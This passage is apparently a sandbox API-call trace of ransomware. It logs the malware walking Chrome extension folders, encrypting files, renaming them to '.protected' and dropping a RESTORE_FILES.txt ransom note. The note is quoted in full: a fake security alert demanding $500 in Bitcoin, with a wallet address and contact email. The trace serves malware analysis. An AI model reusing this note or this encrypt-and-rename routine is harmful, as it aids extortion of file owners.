[0083.988] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.988] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.988] CloseHandle (hObject=0x164) returned 1 [0083.988] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.988] lstrcmpiW (lpString1="te", lpString2="Windows") returned -1 [0083.988] lstrcmpiW (lpString1="te", lpString2="Program Files") returned 1 [0083.988] lstrcmpiW (lpString1="te", lpString2="Program Files (x86)") returned 1 [0083.988] lstrcmpiW (lpString1="te", lpString2="$Recycle.bin") returned 1 [0083.988] lstrcmpiW (lpString1="te", lpString2="System Volume Information") returned 1 [0083.988] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te") returned 150 [0083.988] lstrcmpW (lpString1="te", lpString2=".") returned 1 [0083.988] lstrcmpW (lpString1="te", lpString2="..") returned 1 [0083.989] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\*") returned 152 [0083.989] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.989] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.989] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.989] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.989] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.989] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.989] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\.") returned 152 [0083.989] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.989] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.989] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.989] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.989] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.989] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.989] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.989] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\..") returned 153 [0083.989] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.989] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.989] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.989] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.989] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.989] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.989] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.989] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.989] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json") returned 164 [0083.989] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.989] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.989] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.989] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json") returned 164 [0083.990] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json") returned 164 [0083.990] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json") returned 164 [0083.990] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.990] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.992] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.992] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.993] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.993] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.993] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.993] CloseHandle (hObject=0x168) returned 1 [0083.993] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.protected") returned 174 [0083.993] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.protected")) returned 1 [0083.994] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.994] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.994] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\RESTORE_FILES.txt") returned 168 [0083.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.994] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.994] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.995] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.995] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.995] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.995] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.995] CloseHandle (hObject=0x164) returned 1 [0083.996] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.996] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0083.996] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0083.996] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0083.996] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0083.996] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0083.996] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th") returned 150 [0083.996] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0083.996] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0083.996] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\*") returned 152 [0083.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.996] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.996] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.996] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.996] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.997] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\.") returned 152 [0083.997] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.997] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.997] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.997] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.997] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.997] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.997] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\..") returned 153 [0083.997] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.997] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.997] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.997] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.997] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.997] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.997] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.997] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json") returned 164 [0083.997] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.997] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.997] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.997] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json") returned 164 [0083.998] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json") returned 164 [0083.998] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json") returned 164 [0083.998] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.998] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.000] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.000] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.000] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.000] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0084.000] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0084.000] CloseHandle (hObject=0x168) returned 1 [0084.000] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.protected") returned 174 [0084.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.protected")) returned 1 [0084.001] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0084.001] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0084.001] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\RESTORE_FILES.txt") returned 168 [0084.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.002] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.002] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0084.003] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.003] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0084.003] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: 